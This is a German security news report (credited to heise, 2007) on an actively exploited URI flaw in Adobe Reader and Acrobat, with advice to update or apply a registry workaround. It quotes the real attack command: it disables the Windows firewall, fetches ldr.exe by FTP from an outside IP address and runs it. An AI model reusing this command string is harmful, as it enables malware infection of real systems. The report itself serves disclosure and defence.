URI-Lücke in Adobes Produkten wird aktiv ausgenutzt
Dabei soll es sich um folgende Befehlsfolge handeln:
%/../../../../../../Windows/system32/cmd".exe"" /c /q \\"@echo
off&netsh firewall set opmode mode=disable&echo o 81.95.146.130>1&echo
binary>>1&echo get /ldr.exe>>1&echo quit>>1&ftp -s:1 -v -A>nul&del /q 1&
start ldr.exe&\\" \\"&\\" "nul.bat"
Hier wird zunächst die Firewall unter Windows XP SP2 deaktiviert und per FTP die Datei ldr.exe nachgeladen und gestartet. Was dann im weiteren geschieht, ist den Berichten nicht zu entnehmen. Es ist anzunehmen, dass sich ein Schädling auf dem System einnistet. Um Opfer eines Angriffs zu werden, ist es nicht zwingend erforderlich, einen Link im Dokument anzuklicken. Durch die Unterstützung von ActionScript, einer an JavaScript angelehnten Skriptsprache, kann das Dokument im Reader oder Acrobat die URL ohne Zutun des Anwenders aufrufen und somit die Befehlskette starten.
Die bösartigen PDF-Dateien sollen unter anderem Namen wie BILL.pdf, INVOICE.pdf und STATEMENT.pdf tragen, während als Betreffzeilen INVOICE alacrity, STATEMET indigene und INVOICE depredate gesichtet worden sind. Adobe stellt seit Anfang der Woche das Update 8.1.1 für den Adobe Reader und Acrobat zur Verfügung, in der das URI-Problem behoben ist. Anwender sollten so schnell wie möglich auf die aktuelle Version wechseln. Für diejenigen, denen aus bestimmten Gründen kein Update möglich ist, empfiehlt Adobe, in der Registry die Verknüpfung der mailto-URI mit Adobe-Produkten zu lösen. Ein Anleitung dazu findet sich hier: Update available for vulnerability in versions 8.1 and earlier of Adobe Reader and Acrobat.
Quelle: heise online news vom 24.10.2007 09:36, www.heise.de/newsticker/meldung/97866